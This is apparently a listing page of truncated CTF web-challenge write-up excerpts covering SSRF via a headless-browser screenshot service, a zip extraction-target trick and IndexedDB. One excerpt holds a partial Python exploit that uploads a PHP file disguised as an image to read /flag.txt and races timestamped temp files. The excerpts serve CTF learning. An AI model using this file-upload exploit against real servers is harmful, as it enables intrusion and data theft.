type: #WEB #whitebox difficulty: #hard SOLVED by: #writeup First, review the application overview. The application returns a screenshot of any page as a PNG image. The URL is specified by a GET parameter like /api/screenshot?url=https%3A%2F%2Fwww.google.com%2F. The backend is implemented in JavaScript (Node.js) and opens the page with Headless Chromium to render the content. The flag is stored in /flag.txt. In applications where the server accesses the URL specified by the user, an attack technique called SSRF (Server Side Request Forgery) is known....

colorful board first blood anotherslove mongodb objectid buntime ezstart import requests from datetime import datetime from concurrent.futures import ThreadPoolExecutor import warnings import re warnings.simplefilter('ignore') URL = "https://cc435f7badc1e1fda35d576b.deadsec.quest/" # URL = "http://localhost:1338/" COUNT = 5 def upload(): files = {'files': ('foobar.php', b"<?php readfile('/flag.txt') ?>", 'image/jpeg')} return requests.post(URL + "upload.php", files=files, verify=False) def read(timestamp): return requests.get(URL + f"tmp/foobar_{timestamp}.php", verify=False) diff = 0 while True: timestamp = int(datetime.now().timestamp()) - diff with ThreadPoolExecutor(max_workers=5) as executor: r1 = executor....

type: #WEB #whitebox difficulty: #easy SOLVED by: #myself lesson learnt > after almost 2 days from trying and not understading shit being copypasta person if you don’t understand the code playing with it isn’t enough the challenge opening the web page i see this uploading a file and the site spit out its content looking and the source code it’s takes a zipped file ‘docx is a zipped file btw’ to unzip it and read a traget AT LINE 38 we see that we control the key-value ExtractTarget in our POST request rn its word/document let’s do poc we will replace word/document....

type: #WEB difficulty: #beginner SOLVED by: #myself the challenge IndexedDB is a database that is built into a browser, much more powerful than localStorage. Stores almost any kind of values by keys, multiple key types. Supports transactions for reliability. Supports key range queries, indexes. Can store much bigger volumes of data than localStorage. ***you can view it by using dev tools in your browser

OFFICIAL WRITEUP [[Philanthropy]] https://github.com/AustinStitz-Hacking/csaw23qual